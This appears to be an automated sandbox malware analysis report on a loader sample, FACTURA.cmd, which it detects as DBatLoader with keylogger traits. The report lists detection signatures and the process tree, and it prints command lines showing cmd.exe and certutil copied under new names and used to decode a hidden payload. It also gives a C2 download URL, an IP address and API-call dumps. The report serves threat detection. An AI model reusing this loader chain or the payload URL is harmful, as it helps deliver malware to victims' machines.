Windows Analysis Report
FACTURA.cmd

Overview

General Information

Sample name: FACTURA.cmd
Analysis ID: 1532879
MD5: 41aff4b752555a0e4304ba0e04bb24c8
SHA1: a0cf311711779834c880e99799a8501165036a6c
SHA256: 3b9f52447520a884c7ced8dbfb5d3cef7896a90910ef0b34b13cfecb9bd422cc

Detection

DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
AI detected suspicious sample
Allocates many large memory junks
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Machine Learning detection for dropped file
Registers a new ROOT certificate
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • cmd.exe (PID: 7428 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FACTURA.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7480 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7508 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 7524 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7548 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7564 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 7620 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7636 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • Host.COM (PID: 7652 cmdline: C:\Users\Public\Libraries\Host.COM MD5: 320D5ED383D73182150A145823610493)
    • alpha.exe (PID: 7660 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7688 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
{"Download Url": ["https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx"]}
Source: Process Memory Space: Host.COM PID: 7652, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security
Source: 9.2.Host.COM.2df0000.2.unpack, Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Author: Joe Security

      System Summary

      Source: Process started, Author: Florian Roth (Nextron Systems), Tim Shelton, Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FACTURA.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7428, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7508, ProcessName: alpha.exe
      Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 7508, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7524, ProcessName: extrac32.exe
      Source: Network Connection, Author: Florian Roth (Nextron Systems), Tim Shelton, Data: DestinationIp: 108.170.55.202, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\Host.COM, Initiated: true, ProcessId: 7652, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
      No Suricata rule has matched

      AV Detection

      Source: 9.0.Host.COM.400000.0.unpack, Malware Configuration Extractor: DBatLoader {"Download Url": ["https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx"]}
      Source: taksonsdfg.co.in, Virustotal: Detection: 10%
      Source: https://taksonsdfg.co.in/./, Virustotal: Detection: 5%
      Source: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx, Virustotal: Detection: 11%
      Source: https://taksonsdfg.co.in/x, Virustotal: Detection: 10%
      Source: https://taksonsdfg.co.in/, Virustotal: Detection: 5%
      Source: C:\Users\Public\Libraries\Host.COM, Virustotal: Detection: 51%
      Source: FACTURA.cmd, ReversingLabs: Detection: 33%
      Source: FACTURA.cmd, Virustotal: Detection: 34%
      Source: Submited Sample, Integrated Neural Analysis Model: Matched 93.9% probability
      Source: C:\Users\Public\Libraries\Host.COM, Joe Sandbox ML: detected
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0830C3C NCryptExportKey,#205,#359,#359,#357,6_2_00007FF7E0830C3C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0796C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,6_2_00007FF7E0796C4C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0868C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,6_2_00007FF7E0868C58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866C88 NCryptEnumAlgorithms,#360,6_2_00007FF7E0866C88
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0832C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,6_2_00007FF7E0832C80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0874C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,6_2_00007FF7E0874C80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0862DAC #357,#357,CryptFindOIDInfo,LocalFree,6_2_00007FF7E0862DAC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0858DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,6_2_00007FF7E0858DD0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0830DD4 NCryptGetProperty,#205,#359,#357,#359,#357,6_2_00007FF7E0830DD4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0880DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,6_2_00007FF7E0880DB8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0814DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF7E0814DDC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866DE0 NCryptCreatePersistedKey,#360,6_2_00007FF7E0866DE0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866D2C NCryptFreeBuffer,#360,6_2_00007FF7E0866D2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F2D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF7E07F2D18
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0832D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF7E0832D78
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866D78 NCryptOpenKey,#360,6_2_00007FF7E0866D78
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0830D84 NCryptFreeObject,#205,#357,6_2_00007FF7E0830D84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866EA8 NCryptImportKey,#360,6_2_00007FF7E0866EA8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0890ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,6_2_00007FF7E0890ED0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0830EF4 NCryptImportKey,#205,#359,#359,#357,6_2_00007FF7E0830EF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C0E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07C0E24
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866E48 NCryptSetProperty,#360,6_2_00007FF7E0866E48
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0832E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,6_2_00007FF7E0832E6C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0874E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,6_2_00007FF7E0874E58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085EE94 CryptSignMessage,SetLastError,6_2_00007FF7E085EE94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0802E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF7E0802E7C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D0E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,6_2_00007FF7E07D0E94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866FAC BCryptOpenAlgorithmProvider,#360,6_2_00007FF7E0866FAC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0830FB4 NCryptOpenKey,#205,#359,#357,#357,6_2_00007FF7E0830FB4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086700C BCryptEnumAlgorithms,#360,6_2_00007FF7E086700C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866F2C NCryptExportKey,#360,6_2_00007FF7E0866F2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C8F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,6_2_00007FF7E07C8F1C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0814F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF7E0814F50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085EF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,6_2_00007FF7E085EF74
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0820F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,6_2_00007FF7E0820F58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C4F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,6_2_00007FF7E07C4F90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FB098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,6_2_00007FF7E07FB098
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083B0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF7E083B0A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08670C8 BCryptSetProperty,#360,6_2_00007FF7E08670C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08310D8 NCryptSetProperty,#205,#359,#357,#359,#357,6_2_00007FF7E08310D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08330D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF7E08330D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0829028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,6_2_00007FF7E0829028
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF7E07A302F
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A7034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,6_2_00007FF7E07A7034
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF7E083301C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0837020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF7E0837020
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086705C BCryptGetProperty,#360,6_2_00007FF7E086705C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0831058 NCryptOpenStorageProvider,#205,#359,#357,6_2_00007FF7E0831058
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,6_2_00007FF7E07D107C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08051A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,6_2_00007FF7E08051A4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08311C8 NCryptVerifySignature,#205,#357,#357,#357,#357,6_2_00007FF7E08311C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08671C8 BCryptDestroyKey,#360,6_2_00007FF7E08671C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08331C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF7E08331C0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0867214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,6_2_00007FF7E0867214
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0889208 #357,NCryptEnumKeys,#360,#358,6_2_00007FF7E0889208
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,6_2_00007FF7E085511C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E9134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,6_2_00007FF7E07E9134
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0867124 BCryptGenerateKeyPair,#360,6_2_00007FF7E0867124
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081F168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,6_2_00007FF7E081F168
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0815164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF7E0815164
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0813188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,6_2_00007FF7E0813188
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0867178 BCryptCloseAlgorithmProvider,#360,6_2_00007FF7E0867178
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08332A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF7E08332A8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FB2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,6_2_00007FF7E07FB2B4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F92C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,6_2_00007FF7E07F92C4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08132D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,6_2_00007FF7E08132D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E082F2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF7E082F2F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08092D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,6_2_00007FF7E08092D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CD304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07CD304
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081D30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,6_2_00007FF7E081D30C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CD240 #357,CryptFindOIDInfo,#357,LocalFree,6_2_00007FF7E07CD240
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085D28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,6_2_00007FF7E085D28C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0867290 NCryptIsKeyHandle,#359,#360,#357,#358,6_2_00007FF7E0867290
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08433B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,6_2_00007FF7E08433B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,6_2_00007FF7E086739C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08133A0 CryptVerifyCertificateSignature,CertCompareCertificateName,6_2_00007FF7E08133A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08693A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_00007FF7E08693A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08153E8 CryptEncodeObjectEx,GetLastError,#357,6_2_00007FF7E08153E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF7E081B3D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F13F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,6_2_00007FF7E07F13F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CB324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,6_2_00007FF7E07CB324
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C7340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,6_2_00007FF7E07C7340
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F5338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF7E07F5338
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EB350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,6_2_00007FF7E07EB350
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BB36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,6_2_00007FF7E07BB36C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0833390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF7E0833390
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085F4A0 CryptHashPublicKeyInfo,SetLastError,6_2_00007FF7E085F4A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E084B4EC CryptDecodeObjectEx,SetLastError,6_2_00007FF7E084B4EC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08614F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,6_2_00007FF7E08614F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F3504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,6_2_00007FF7E07F3504
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08334F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF7E08334F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF7E083342C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF7E086141C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0795438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,6_2_00007FF7E0795438
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E084B464 CryptEncodeObjectEx,SetLastError,6_2_00007FF7E084B464
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081F488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,6_2_00007FF7E081F488
